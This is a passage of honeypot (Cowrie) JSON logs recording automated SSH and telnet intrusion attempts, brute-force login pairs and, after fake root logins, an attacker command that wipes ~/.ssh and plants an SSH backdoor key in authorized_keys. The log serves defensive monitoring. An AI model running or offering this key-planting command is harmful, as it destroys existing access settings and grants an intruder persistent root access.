{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:49.635630Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:49.926208Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:50.608616Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:15:50.609286Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.session.closed","duration":12.739440441131592,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:50.771141Z","src_ip":"202.107.95.221","session":"8505f039785a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:15:50.901307Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:50.902283Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":36929,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbeb9e8f0b24","protocol":"telnet","message":"New connection: 202.107.95.221:36929 (1.2.3.4:23) [session: bbeb9e8f0b24]","sensor":"my-vps","timestamp":"2025-09-08T22:15:50.997607Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52264,"dst_ip":"1.2.3.4","dst_port":22,"session":"14c4aefb8b63","protocol":"ssh","message":"New connection: 212.227.235.229:52264 (1.2.3.4:22) [session: 14c4aefb8b63]","sensor":"my-vps","timestamp":"2025-09-08T22:15:51.190330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:51.191009Z","src_ip":"212.227.235.229","session":"14c4aefb8b63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:51.480983Z","src_ip":"212.227.235.229","session":"14c4aefb8b63"}
{"eventid":"cowrie.session.closed","duration":12.536459922790527,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:51.773140Z","src_ip":"202.107.95.221","session":"5784218768d6"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37013,"dst_ip":"1.2.3.4","dst_port":23,"session":"a39d605e85ba","protocol":"telnet","message":"New connection: 202.107.95.221:37013 (1.2.3.4:23) [session: a39d605e85ba]","sensor":"my-vps","timestamp":"2025-09-08T22:15:51.921146Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:15:52.681832Z","src_ip":"212.227.235.229","session":"14c4aefb8b63"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:53.974254Z","src_ip":"212.227.235.229","session":"14c4aefb8b63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52268,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c5dc15fd730","protocol":"ssh","message":"New connection: 212.227.235.229:52268 (1.2.3.4:22) [session: 2c5dc15fd730]","sensor":"my-vps","timestamp":"2025-09-08T22:15:54.265896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:54.266922Z","src_ip":"212.227.235.229","session":"2c5dc15fd730"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:54.559890Z","src_ip":"212.227.235.229","session":"2c5dc15fd730"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:55.772301Z","src_ip":"212.227.235.229","session":"2c5dc15fd730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50004,"dst_ip":"1.2.3.4","dst_port":22,"session":"507167f18260","protocol":"ssh","message":"New connection: 212.227.235.229:50004 (1.2.3.4:22) [session: 507167f18260]","sensor":"my-vps","timestamp":"2025-09-08T22:15:55.793536Z"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:56.065930Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:56.067304Z","src_ip":"212.227.235.229","session":"2c5dc15fd730"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:56.332343Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:56.585030Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.login.success","username":"root","password":"01234567","message":"login attempt [root/01234567] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:58.252869Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:01.086395Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:01.088127Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:01.089447Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:02.412777Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:03.687221Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:16:03.687961Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.session.closed","duration":12.822383165359497,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:03.819919Z","src_ip":"202.107.95.221","session":"bbeb9e8f0b24"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37244,"dst_ip":"1.2.3.4","dst_port":23,"session":"20c7544351f3","protocol":"telnet","message":"New connection: 202.107.95.221:37244 (1.2.3.4:23) [session: 20c7544351f3]","sensor":"my-vps","timestamp":"2025-09-08T22:16:04.003701Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:16:04.687418Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:04.688336Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.session.closed","duration":12.778048992156982,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:04.699120Z","src_ip":"202.107.95.221","session":"a39d605e85ba"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37245,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f14e74c6f4f","protocol":"telnet","message":"New connection: 202.107.95.221:37245 (1.2.3.4:23) [session: 7f14e74c6f4f]","sensor":"my-vps","timestamp":"2025-09-08T22:16:04.892375Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38544,"dst_ip":"1.2.3.4","dst_port":22,"session":"81a42d8310a3","protocol":"ssh","message":"New connection: 212.227.235.229:38544 (1.2.3.4:22) [session: 81a42d8310a3]","sensor":"my-vps","timestamp":"2025-09-08T22:16:07.270028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:07.273913Z","src_ip":"212.227.235.229","session":"81a42d8310a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:07.522845Z","src_ip":"212.227.235.229","session":"81a42d8310a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47568,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f0932b8ab9e","protocol":"ssh","message":"New connection: 212.227.235.229:47568 (1.2.3.4:22) [session: 9f0932b8ab9e]","sensor":"my-vps","timestamp":"2025-09-08T22:16:08.456982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:08.457757Z","src_ip":"212.227.235.229","session":"9f0932b8ab9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:08.772014Z","src_ip":"212.227.235.229","session":"9f0932b8ab9e"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37281,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e3630457a9e","protocol":"telnet","message":"New connection: 202.107.95.221:37281 (1.2.3.4:23) [session: 4e3630457a9e]","sensor":"my-vps","timestamp":"2025-09-08T22:16:09.514307Z"}
{"eventid":"cowrie.login.failed","username":"proxyuser","password":"12345","message":"login attempt [proxyuser/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:10.069064Z","src_ip":"212.227.235.229","session":"9f0932b8ab9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38554,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae4f7417382a","protocol":"ssh","message":"New connection: 212.227.235.229:38554 (1.2.3.4:22) [session: ae4f7417382a]","sensor":"my-vps","timestamp":"2025-09-08T22:16:10.192803Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:10.194838Z","src_ip":"212.227.235.229","session":"81a42d8310a3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:10.199014Z","src_ip":"212.227.235.229","session":"ae4f7417382a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:11.386412Z","src_ip":"212.227.235.229","session":"9f0932b8ab9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43356,"dst_ip":"1.2.3.4","dst_port":22,"session":"c286785c6349","protocol":"ssh","message":"New connection: 212.227.235.229:43356 (1.2.3.4:22) [session: c286785c6349]","sensor":"my-vps","timestamp":"2025-09-08T22:16:11.420632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:11.422191Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:11.752190Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:11.947419Z","src_ip":"212.227.235.229","session":"ae4f7417382a"}
